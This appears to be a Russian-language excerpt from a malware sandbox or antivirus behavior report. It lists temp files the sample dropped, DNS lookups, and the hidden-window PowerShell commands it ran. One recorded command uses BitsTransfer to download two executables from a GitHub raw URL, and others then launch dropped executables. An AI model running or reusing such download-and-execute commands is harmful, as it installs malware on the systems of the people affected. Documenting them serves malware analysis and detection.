Техническая информация
- %TEMP%\ixp000.tmp\kgwkwru.dat
- %TEMP%\ixp000.tmp\gqas
- %TEMP%\ixp000.tmp\gqas
- %TEMP%\ixp000.tmp\kgwkwru.dat
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK microsoft.com
- DNS ASK ra#.####ubusercontent.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/gzxa/v/main/bild.exe,https://raw.githubusercontent.com/gzxa/v/main/SRBPolaris.exe -Destination ...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process tiyF.exe; Start-Process miJD.exe;' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process tiyF.exe; Start-Process miJD.exe;